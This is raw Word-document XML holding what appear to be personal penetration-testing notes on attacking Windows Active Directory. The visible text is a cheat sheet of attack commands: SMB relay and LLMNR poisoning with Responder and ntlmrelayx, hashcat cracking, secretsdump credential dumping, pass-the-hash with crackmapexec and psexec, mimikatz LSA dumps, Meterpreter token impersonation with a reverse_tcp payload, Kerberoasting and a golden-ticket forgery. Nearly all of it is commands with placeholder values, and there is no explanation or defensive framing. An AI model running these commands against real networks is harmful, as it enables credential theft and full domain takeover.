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70B5C" w14:textId="74E3AFB6" w:rsidR="008A341C" w:rsidRDefault="008A341C" w:rsidP="008A341C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Desable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> SMB sign in attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD8DDBD" w14:textId="7008E780" w:rsidR="008A341C" w:rsidRDefault="008A341C" w:rsidP="008A341C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap  --script=smb2-security-mode.nse -p445 192.168.109.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A61103" w14:textId="1DE76F24" w:rsidR="008A341C" w:rsidRDefault="008A341C" w:rsidP="008A341C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="529F83C1" w14:textId="13BDCAF6" w:rsidR="008A341C" w:rsidRDefault="008A341C" w:rsidP="008A341C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Make changes in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>responder.config</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file Turn off SMB and Http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BB6FE8" w14:textId="0858EF1E" w:rsidR="0082622C" w:rsidRDefault="0082622C" w:rsidP="008A341C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Responder -I eth0 </w:t>
      </w:r>
      <w:r w:rsidR="005C622D">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005C622D">
        <w:t>rdwv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1CB9C5A0" w14:textId="622EE4B0" w:rsidR="00223CC5" w:rsidRDefault="00223CC5" w:rsidP="008A341C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ntlmrelaxx.py </w:t>
      </w:r>
      <w:r w:rsidR="00663939">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00663939">
        <w:t>tf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00663939">
        <w:t xml:space="preserve"> targets.txt</w:t>
      </w:r>
      <w:r w:rsidR="003136EB">
        <w:t xml:space="preserve"> -smb2support</w:t>
      </w:r>
      <w:r w:rsidR="00D93EB1">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D93EB1">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="73150C75" w14:textId="77777777" w:rsidR="00573BC3" w:rsidRDefault="00573BC3" w:rsidP="00573BC3"/>
    <w:p w14:paraId="2DBC8DAD" w14:textId="5DF9EA0B" w:rsidR="00573BC3" w:rsidRDefault="00573BC3" w:rsidP="00573BC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">LLMNR </w:t>
      </w:r>
      <w:r w:rsidR="00734C13">
        <w:t>Link Local Multicast Name Resolution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B42D18" w14:textId="72A2098C" w:rsidR="00741002" w:rsidRDefault="00741002" w:rsidP="00741002">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Responder -I </w:t>
      </w:r>
      <w:r w:rsidR="0001194F">
        <w:t>tun</w:t>
      </w:r>
      <w:r>
        <w:t>0  -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rdw</w:t>
      </w:r>
      <w:r w:rsidR="0001194F">
        <w:t>v</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="49939B2D" w14:textId="7E7246FF" w:rsidR="00CF4C4D" w:rsidRDefault="00E84B8E" w:rsidP="00741002">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -m 5600 hashes.txt rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8AC36D" w14:textId="77777777" w:rsidR="008B2FF1" w:rsidRDefault="008B2FF1" w:rsidP="008B2FF1"/>
    <w:p w14:paraId="6F6A21F6" w14:textId="7B29C847" w:rsidR="00265D24" w:rsidRDefault="00265D24" w:rsidP="00265D24">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Dumping Hashes with secretdump.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385A7401" w14:textId="58850C49" w:rsidR="00265D24" w:rsidRDefault="00265D24" w:rsidP="00265D24">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Secretsdump.py domain/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>username:</w:t>
      </w:r>
      <w:r w:rsidR="00346DCC">
        <w:t>password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="785253AA" w14:textId="77777777" w:rsidR="00346DCC" w:rsidRDefault="00346DCC" w:rsidP="00346DCC">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B60CCC1" w14:textId="0D096870" w:rsidR="00741002" w:rsidRDefault="001B0E08" w:rsidP="0006675E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Pass the Hash</w:t>
      </w:r>
      <w:r w:rsidR="0006675E">
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0006675E">
        <w:t>crackmapexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="78F4ED03" w14:textId="38D87523" w:rsidR="00734C13" w:rsidRDefault="0006675E" w:rsidP="00E2301E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Crackmapexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E2301E">
        <w:t xml:space="preserve"> 192.0.0.0/24 -u &lt;username&gt; -H &lt;hash&gt; --local-auth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F40AC4B" w14:textId="77777777" w:rsidR="002A60D1" w:rsidRDefault="002A60D1" w:rsidP="00E2301E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7502ED75" w14:textId="07B45A7A" w:rsidR="002A60D1" w:rsidRDefault="002A60D1" w:rsidP="00E2301E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Psexec.py “&lt;user</w:t>
      </w:r>
      <w:r w:rsidR="009E04A4">
        <w:t>name&gt;”:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009E04A4">
        <w:t>Ipaddress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006738BE">
        <w:t xml:space="preserve"> -hashes</w:t>
      </w:r>
      <w:r w:rsidR="006405C6">
        <w:t xml:space="preserve"> &lt;LLMNR and NTLM Hash&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D5E77E" w14:textId="77777777" w:rsidR="00EC42D0" w:rsidRDefault="00EC42D0" w:rsidP="00E2301E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25BC1677" w14:textId="08C20500" w:rsidR="006405C6" w:rsidRDefault="00EC42D0" w:rsidP="00EC42D0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Token Impersonation after getting Meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0EA9C8" w14:textId="58C69D7F" w:rsidR="00C60F83" w:rsidRDefault="00C60F83" w:rsidP="00C60F83">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>List_tokens</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -u</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2929F474" w14:textId="6BE55FB0" w:rsidR="00C60F83" w:rsidRDefault="00EC5BF2" w:rsidP="00C60F83">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Impersonate_token</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00081989">
        <w:t>domain\username</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402B2A34" w14:textId="7F743578" w:rsidR="00081989" w:rsidRDefault="001F3DE6" w:rsidP="00C60F83">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00081989">
        <w:t>hell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="20A64C94" w14:textId="40EB1CCD" w:rsidR="006D2F25" w:rsidRDefault="006D2F25" w:rsidP="00C60F83">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Command’”</w:t>
      </w:r>
      <w:r w:rsidR="009775B2">
        <w:t>privilege</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009775B2">
        <w:t>::debug” “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009775B2">
        <w:t>LSADump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009775B2">
        <w:t>::LSA /patch” exit’</w:t>
      </w:r>
      <w:r w:rsidR="00A06096">
        <w:t xml:space="preserve"> -Computer </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A06096">
        <w:t>Pcname.domain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5EB8F8F2" w14:textId="77777777" w:rsidR="00A06096" w:rsidRDefault="00A06096" w:rsidP="00C60F83">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D03BA63" w14:textId="23E82BE6" w:rsidR="00A06096" w:rsidRDefault="00865C76" w:rsidP="00C60F83">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1CDF916B" w14:textId="150911C6" w:rsidR="00865C76" w:rsidRDefault="00865C76" w:rsidP="00C60F83">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Use exploit/windows</w:t>
      </w:r>
      <w:r w:rsidR="006A4ED9">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006A4ED9">
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006A4ED9">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006A4ED9">
        <w:t>psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6C65015E" w14:textId="75BC29C7" w:rsidR="00C71284" w:rsidRDefault="00C71284" w:rsidP="00C60F83">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Set all options then set </w:t>
      </w:r>
      <w:r w:rsidR="00112316">
        <w:t>payload windows/x64</w:t>
      </w:r>
      <w:r w:rsidR="00AD6370">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AD6370">
        <w:t>meter</w:t>
      </w:r>
      <w:r w:rsidR="0050116D">
        <w:t>preter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0050116D">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0050116D">
        <w:t>reverse_</w:t>
      </w:r>
      <w:r w:rsidR="0080113E">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="439B8EF2" w14:textId="16CD7E31" w:rsidR="00423E92" w:rsidRDefault="00423E92" w:rsidP="00C60F83">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Load in</w:t>
      </w:r>
      <w:r w:rsidR="00066D40">
        <w:t>cog</w:t>
      </w:r>
      <w:r>
        <w:t>nito</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5BAA92" w14:textId="77777777" w:rsidR="00DD783E" w:rsidRDefault="00DD783E" w:rsidP="00DD783E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>List_tokens</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -u</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AB7EE7" w14:textId="77777777" w:rsidR="00DD783E" w:rsidRDefault="00DD783E" w:rsidP="00DD783E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Impersonate_token</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> domain\username</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253031EC" w14:textId="77777777" w:rsidR="00DD783E" w:rsidRDefault="00DD783E" w:rsidP="00DD783E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Shell -&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4E4230EC" w14:textId="77777777" w:rsidR="00DD783E" w:rsidRDefault="00DD783E" w:rsidP="00C60F83">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34F09BEF" w14:textId="77777777" w:rsidR="009D7FF1" w:rsidRDefault="00DD783E" w:rsidP="00C60F83">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If permission denied for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hashdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005119CD">
        <w:t>run &lt;rev2self&gt; command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9CCCE0" w14:textId="77777777" w:rsidR="00867940" w:rsidRDefault="00867940" w:rsidP="009D7FF1"/>
    <w:p w14:paraId="06D6DDC8" w14:textId="77777777" w:rsidR="009C1BDB" w:rsidRDefault="00867940" w:rsidP="00867940">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Kerberoasting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="135CF1C7" w14:textId="77777777" w:rsidR="00C875E5" w:rsidRDefault="009C1BDB" w:rsidP="003E4DE3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Impacket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003E4DE3">
        <w:t xml:space="preserve"> -&gt; python GetUser</w:t>
      </w:r>
      <w:r w:rsidR="00F2313D">
        <w:t>SPNs.py domain/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F2313D">
        <w:t>username:password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004305A0">
        <w:t xml:space="preserve"> -dc-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AF6E6E">
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="004305A0">
        <w:t>p</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004305A0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004305A0">
        <w:t>ipaddress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004305A0">
        <w:t xml:space="preserve"> -request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1551FF2E" w14:textId="52805FD0" w:rsidR="00DD783E" w:rsidRDefault="00C875E5" w:rsidP="003E4DE3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> –help | grep </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>kerberos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005119CD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B7CA79" w14:textId="44CCC916" w:rsidR="0095551C" w:rsidRDefault="0095551C" w:rsidP="003E4DE3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hashcat.exe -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B164F9">
        <w:t>payload_number</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B164F9">
        <w:t xml:space="preserve"> hash.txt rockyou.txt -O</w:t>
      </w:r>
      <w:r w:rsidR="00B44F8E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F403B59" w14:textId="4D87486E" w:rsidR="00AA62BE" w:rsidRDefault="00AA62BE" w:rsidP="00AA62BE"/>
    <w:p w14:paraId="453305C4" w14:textId="77777777" w:rsidR="00AA62BE" w:rsidRDefault="00AA62BE" w:rsidP="00AA62BE"/>
    <w:p w14:paraId="6ACE540A" w14:textId="26ED84FE" w:rsidR="00AA62BE" w:rsidRDefault="00AA62BE" w:rsidP="00AA62BE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Golden Ticket Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3BBB67" w14:textId="45B97E0E" w:rsidR="00AA62BE" w:rsidRDefault="00AA62BE" w:rsidP="00AA62BE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Mimi</w:t>
      </w:r>
      <w:r w:rsidR="001651D8">
        <w:t>kat</w:t>
      </w:r>
      <w:r>
        <w:t>z.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC95006" w14:textId="1E413E0E" w:rsidR="001651D8" w:rsidRDefault="001651D8" w:rsidP="00AA62BE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Privilege::debug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2279FF" w14:textId="7BA35F9A" w:rsidR="008C1593" w:rsidRDefault="008C1593" w:rsidP="00AA62BE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Lsadump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /inject /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>name:username</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00060EBE">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00060EBE">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="00060EBE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002A0F6C">
        <w:t>note the Sid and NTLM hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE4DF14" w14:textId="1BB2C17D" w:rsidR="001B4661" w:rsidRDefault="00082742" w:rsidP="001B4661">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Kerberos::golden /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>User:username</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0061594B">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0061594B">
        <w:t>domain:domainname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0061594B">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0061594B">
        <w:t>sid:sidofdomain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E53F8C">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E53F8C">
        <w:t>krbt</w:t>
      </w:r>
      <w:r w:rsidR="00725FD3">
        <w:t>gt:NTLMhash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E31D5B">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E31D5B">
        <w:t>id:anynumber</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E31D5B">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E31D5B">
        <w:t>ptt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="55FB1E30" w14:textId="36B50A26" w:rsidR="001B4661" w:rsidRDefault="001B4661" w:rsidP="001B4661">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Misc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009E4A4C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FA109E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761ED1B2" w14:textId="77777777" w:rsidR="00DD452C" w:rsidRDefault="00DD452C" w:rsidP="001B4661">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="473A6704" w14:textId="77777777" w:rsidR="00DD452C" w:rsidRDefault="00DD452C" w:rsidP="001B4661">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AF93236" w14:textId="2855C182" w:rsidR="00DD452C" w:rsidRDefault="00DD452C" w:rsidP="00DD452C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Password Cracking with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BD1519">
        <w:t>mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3BC7ED27" w14:textId="3C25ABF7" w:rsidR="00BD1519" w:rsidRDefault="00BD1519" w:rsidP="00BD1519">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7F1CF303" w14:textId="5C99D836" w:rsidR="008E1069" w:rsidRDefault="008E1069" w:rsidP="00BD1519">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Pn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> –script vuln </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ipaddress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00970A1A" w14:textId="77777777" w:rsidR="008E1069" w:rsidRDefault="008E1069" w:rsidP="00BD1519">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19123E53" w14:textId="77777777" w:rsidR="00AA62BE" w:rsidRDefault="00AA62BE" w:rsidP="00AA62BE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5739A087" w14:textId="77777777" w:rsidR="00AA62BE" w:rsidRDefault="00AA62BE" w:rsidP="00AA62BE"/>
    <w:p w14:paraId="6FE002DF" w14:textId="77777777" w:rsidR="00DD783E" w:rsidRDefault="00DD783E" w:rsidP="00C60F83">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57363761" w14:textId="77777777" w:rsidR="001D5EF0" w:rsidRDefault="001D5EF0" w:rsidP="00C60F83">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="001D5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1341D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FD80CBD6"/>
